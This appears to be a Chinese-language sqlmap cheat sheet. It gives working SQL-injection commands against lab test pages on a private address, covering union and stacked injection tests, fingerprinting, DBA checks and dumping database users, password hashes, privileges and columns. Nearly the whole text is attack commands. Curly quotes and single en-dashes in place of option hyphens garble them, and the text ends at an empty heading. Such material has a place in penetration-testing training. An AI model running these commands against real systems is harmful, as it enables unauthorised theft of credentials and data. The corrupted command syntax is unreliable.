In this simple example, sqlmap could detect the SQL injection and exploit it without need to provide a custom injection payload, but sometimes in the real world application it is necessary to provide it.
页面比较
python sqlmap.py -u “http://192.168.1.121/sqlmap/mysql/get_int_refresh.php?id=1″ –string “luther” -v 1
python sqlmap.py -u “http://192.168.1.121/sqlmap/mysql/get_int_refresh.php?id=1″ –regexp “<td>lu[w][w]er” -v
排除网站的内容
python sqlmap.py -u “http://192.168.1.121/sqlmap/mysql/get_int_refresh.php?id=1″ –excl-reg “Dynamic content: ([d]+)”
多语句测试,php内嵌函数mysql_query(),不支持多语句
python sqlmap.py -u “http://192.168.1.121/sqlmap/mysql/get_int.php?id=1″ –stacked-test -v 1
union注入测试
python sqlmap.py -u “http://192.168.1.121/sqlmap/oracle/get_int.php?id=1″ –union-test -v 1
unionz注入配合orderby
python sqlmap.py -u “http://192.168.1.121/sqlmap/pgsql/get_str.php?id=1″ –union-test –union-tech orderby -v 1
python sqlmap.py -u “http://192.168.1.121/sqlmap/mssql/get_int.php?id=1″ -v 1 –union-use –banner
python sqlmap.py -u “http://192.168.1.121/sqlmap/mysql/get_int.php?id=1″ -v 5 –union-use –current-user
python sqlmap.py -u “http://192.168.1.121/sqlmap/mysql/get_int_partialunion.php?id=1″ -v 1 –union-use –dbs
fingerprint
python sqlmap.py -u “http://192.168.1.121/sqlmap/mssql/get_int.php?id=1″ -v 1 -f
python sqlmap.py -u “http://192.168.123.36/sqlmap/get_str.asp?name=luther” -v 1 -f -b
判断当前用户是否是dba
python sqlmap.py -u “http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1″ –is-dba -v 1
列举数据库用户
python sqlmap.py -u “http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1″ –users -v 0
列举数据库用户密码
python sqlmap.py -u “http://192.168.1.121/sqlmap/mysql/get_int.php?id=1″ –passwords -v 0
python sqlmap.py -u “http://192.168.1.121/sqlmap/mssql/get_int.php?id=1″ –passwords -U sa -v 0
查看用户权限
python sqlmap.py -u “http://192.168.1.121/sqlmap/oracle/get_int.php?id=1″ –privileges -v 0
python sqlmap.py -u “http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1″ –privileges -U postgres -v 0
列数据库
python sqlmap.py -u “http://192.168.1.121/sqlmap/mssql/get_int.php?id=1″ –dbs -v 0
列出指定数据库指定表的列名
python sqlmap.py -u “http://192.168.1.121/sqlmap/mysql/get_int.php?id=1″ –columns -T users -D test -v 1
列出指定数据库的指定表的指定列的内容
